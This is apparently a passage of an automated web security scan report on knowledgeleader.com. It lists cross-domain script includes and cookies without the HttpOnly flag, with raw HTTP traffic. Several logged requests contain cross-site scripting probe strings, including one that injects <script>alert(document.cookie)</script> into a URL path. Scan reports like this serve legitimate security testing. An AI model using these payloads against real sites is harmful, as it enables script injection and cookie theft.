Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/15/addthis_widget.js

Request

GET /KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000EE)%3C/script%3E HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

5.4. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/15/addthis_widget.js

Request

Response

5.5. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/15/addthis_widget.js

Request

GET /KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:07 GMT
Last-Modified: Thu, 28 Apr 2011 13:47:06 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 24540
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:23 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>KLplus - KnowledgeLeader plus Online CPE Courses and Risk Briefs</title><link rel="shortcut icon" href="/icons/Know
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/15/addthis_widget.js"></script>
...[SNIP]...

5.6. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/15/addthis_widget.js

Request

Response

5.7. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Forgot%20Password!OpenForm&Seq=1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Forgot%20Password!OpenForm&Seq=1

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/15/addthis_widget.js

Request

GET /KnowledgeLeader/Registration.nsf/Forgot%20Password!OpenForm&Seq=1 HTTP/1.1
Host: www.knowledgeleader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:07 GMT
Connection: close
Last-Modified: Thu, 28 Apr 2011 13:54:05 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 14832
Expires: 0
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:22 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<LINK REL="STYLESHEET" type="text/css" href="/KnowledgeLeader/GlobalStyle.css"><title>KnowledgeLeader Registration - Forgo
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/15/addthis_widget.js"></script>
...[SNIP]...

5.8. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Forgot+Password previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Forgot+Password

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/15/addthis_widget.js

Request

GET /KnowledgeLeader/Registration.nsf/Forgot+Password HTTP/1.1
Host: www.knowledgeleader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:07 GMT
Connection: close
Last-Modified: Thu, 28 Apr 2011 13:54:05 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 14832
Expires: 0
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:23 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<LINK REL="STYLESHEET" type="text/css" href="/KnowledgeLeader/GlobalStyle.css"><title>KnowledgeLeader Registration - Forgo
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/15/addthis_widget.js"></script>
...[SNIP]...

5.9. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Forgot+Password!OpenForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Forgot+Password!OpenForm

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/15/addthis_widget.js

Request

GET /KnowledgeLeader/Registration.nsf/Forgot+Password!OpenForm HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:41:28 GMT
Last-Modified: Thu, 28 Apr 2011 13:41:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 14832
Expires: 0
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:43 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<LINK REL="STYLESHEET" type="text/css" href="/KnowledgeLeader/GlobalStyle.css"><title>KnowledgeLeader Registration - Forgo
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/15/addthis_widget.js"></script>
...[SNIP]...

5.10. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Message!OpenForm&DisplayException%20Email%20Not%20FoundGeneric previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Message!OpenForm&DisplayException%20Email%20Not%20FoundGeneric

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/15/addthis_widget.js

Request

GET /KnowledgeLeader/Registration.nsf/Message!OpenForm&DisplayException%20Email%20Not%20FoundGeneric HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Forgot%20Password!OpenForm&Seq=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:41:38 GMT
Last-Modified: Thu, 28 Apr 2011 13:41:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12872
Expires: 0
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:53 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<LINK REL="STYLESHEET" type="text/css" href="/KnowledgeLeader/GlobalStyle.css"><title>KnowledgeLeader Registration - </tit
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/15/addthis_widget.js"></script>
...[SNIP]...

5.11. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Registration previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Registration

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/15/addthis_widget.js
https://seal.verisign.com/getseal?host_name=www.knowledgeleader.com&size=S&use_flash=NO&use_transparent=YES&lang=en

Request

GET /KnowledgeLeader/Registration.nsf/Registration HTTP/1.1
Host: www.knowledgeleader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:08 GMT
Connection: close
Last-Modified: Thu, 28 Apr 2011 13:54:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 88384
Expires: 0
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:24 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<LINK REL="STYLESHEET" type="text/css" href="/KnowledgeLeader/GlobalStyle.css"><title>KnowledgeLeader Registration - Regis
...[SNIP]...
<br>
<script src=https://seal.verisign.com/getseal?host_name=www.knowledgeleader.com&size=S&use_flash=NO&use_transparent=YES&lang=en></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/15/addthis_widget.js"></script>
...[SNIP]...

5.12. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/15/addthis_widget.js
https://seal.verisign.com/getseal?host_name=www.knowledgeleader.com&size=S&use_flash=NO&use_transparent=YES&lang=en

Request

GET /KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:41:49 GMT
Last-Modified: Thu, 28 Apr 2011 13:41:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 89922
Expires: 0
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:07:04 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<LINK REL="STYLESHEET" type="text/css" href="/KnowledgeLeader/GlobalStyle.css"><title>KnowledgeLeader Registration - Regis
...[SNIP]...
<br>
<script src=https://seal.verisign.com/getseal?host_name=www.knowledgeleader.com&size=S&use_flash=NO&use_transparent=YES&lang=en></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/15/addthis_widget.js"></script>
...[SNIP]...

5.13. http://www.knowledgeleader.com/KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/15/addthis_widget.js

Request

GET /KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000115)%3C/script%3E HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

6. Cookie without HttpOnly flag set previous next
There are 46 instances of this issue:

/
/KnowledgeLeader/ContactUs.nsf/Questions!OpenForm&header
/KnowledgeLeader/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument
/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header
/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header
/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument
/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus
/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus+Title
/KnowledgeLeader/Content.nsf/Web+Landing+Page+Topics
/KnowledgeLeader/Content.nsf/dce93ca8c1f384d6862571420036f06c/14d45544af859e4a8825787a00617e85/FreeTrialImage/0.84!OpenElement&FieldElemFormat=jpg
/KnowledgeLeader/GlobalStyle.css
/KnowledgeLeader/Registration.nsf/2a0e628c2ffba03d88257384007eb0e4/$Body/0.350A!OpenElement&FieldElemFormat=gif
/KnowledgeLeader/Registration.nsf/Authentication+Details!OpenForm
/KnowledgeLeader/Registration.nsf/Forgot%20Password!OpenForm&Seq=1
/KnowledgeLeader/Registration.nsf/Forgot+Password
/KnowledgeLeader/Registration.nsf/Forgot+Password!OpenForm
/KnowledgeLeader/Registration.nsf/Message!OpenForm&DisplayException%20Email%20Not%20FoundGeneric
/KnowledgeLeader/Registration.nsf/Registration
/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial
/KnowledgeLeader/RegistrationCommon.js
/KnowledgeLeader/RegistrationForms.js
/KnowledgeLeader/Resources.nsf/Description/CPE%20BCM%20Link/$FILE/icon_bcm.png
/KnowledgeLeader/Resources.nsf/Description/CPE%20Cost%20Link/$FILE/icon_cost.png
/KnowledgeLeader/Resources.nsf/Description/CPE%20Internal%20Audit%20Link/$FILE/icon_audit.png
/KnowledgeLeader/Resources.nsf/Description/CPE%20Loss%20Prevention%20Link/$FILE/icon_lp.png
/KnowledgeLeader/Resources.nsf/Description/CPE%20SOX%20Link/$FILE/icon_sox.png
/KnowledgeLeader/Resources.nsf/Description/CPE%20Training%20Link/$FILE/icon_training.png
/KnowledgeLeader/Resources.nsf/Description/KLPlusLogo/$FILE/KLPlus_LOGO.JPG
/KnowledgeLeaderd6fb7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e34599a0f/Registration.nsf/Registration!OpenForm&AccountType=Trial
/favicon.ico
/icons/KnowledgeLeader/Contact.css
/icons/KnowledgeLeader/Guest+Home.css
/icons/KnowledgeLeader/Images/Blank.gif
/icons/KnowledgeLeader/Images/Bullet.gif
/icons/KnowledgeLeader/Images/Check_3a.gif
/icons/KnowledgeLeader/Images/Facebook.jpg
/icons/KnowledgeLeader/Images/KL_Icon.ico
/icons/KnowledgeLeader/Images/KnowledgeLeader_Logo.gif
/icons/KnowledgeLeader/Images/LinkedIn.JPG
/icons/KnowledgeLeader/Images/RSS.gif
/icons/KnowledgeLeader/KLPlus.css
/icons/KnowledgeLeader/pngfix.js
/icons/KnowledgeLeader/xGlobal.css
/icons/KnowledgeLeader/xGlobal.js
/icons/ecblank.gif
/names.nsf

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

6.1. http://www.knowledgeleader.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:05:46 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.2. http://www.knowledgeleader.com/KnowledgeLeader/ContactUs.nsf/Questions!OpenForm&header previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/ContactUs.nsf/Questions!OpenForm&header

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KnowledgeLeader/ContactUs.nsf/Questions!OpenForm&header HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:46:55 GMT
Last-Modified: Thu, 28 Apr 2011 13:46:54 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 6555
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:11 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Contact Us</title><title>Contact Us - KnowledgeLeader Internal Audit and Risk Management Community</title>
<link re
...[SNIP]...

6.3. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/AboutKLValueProposition!OpenDocument

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:34 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.4. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:05 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:50 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1011
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:05 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
</head>
<body text="#000000" bgcolor="white" style="margin:0px; padding:0px" onload="//var fullURL = window.location.href;
...[SNIP]...

6.5. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:07:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.6. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:23 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.7. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:21 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus HTTP/1.1
Host: www.knowledgeleader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:06 GMT
Connection: close
Last-Modified: Thu, 28 Apr 2011 09:00:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 41476
Cache-control: private
ETag: W/"MTAtODE5RC04ODI1Nzg3OTAwNTI2Q0RGLTg4MjU3ODgwMDAzMTc3MUYtMC1Bbm9ueW1vdXM="
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:21 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="robots" content="noindex">
<title>Web+Landing+Page+KLplus</title>
<script language="JavaScript" type="text/jav
...[SNIP]...

6.8. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus+Title previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus+Title

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:22 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus+Title HTTP/1.1
Host: www.knowledgeleader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:07 GMT
Connection: close
Last-Modified: Thu, 28 Apr 2011 09:00:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 41042
Cache-control: private
ETag: W/"MTAtODE5RC04ODI1Nzg3OTAwNTI2Q0RGLTg4MjU3ODgwMDAzMTc3MUYtMC1Bbm9ueW1vdXM="
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:22 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="robots" content="noindex">
<title>Web+Landing+Page+KLplus+Title</title>
<script language="JavaScript" type="te
...[SNIP]...

6.9. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Landing+Page+Topics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Landing+Page+Topics

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:21 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KnowledgeLeader/Content.nsf/Web+Landing+Page+Topics HTTP/1.1
Host: www.knowledgeleader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:06 GMT
Connection: close
Last-Modified: Thu, 28 Apr 2011 09:00:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 41976
Cache-control: private
ETag: W/"MTAtODE5RC04ODI1Nzg3OTAwNTI2Q0RGLTg4MjU3ODgwMDAzMTc3MUYtMC1Bbm9ueW1vdXM="
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:21 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="robots" content="noindex">
<title>Web+Landing+Page+Topics</title>
<script language="JavaScript" type="text/jav
...[SNIP]...

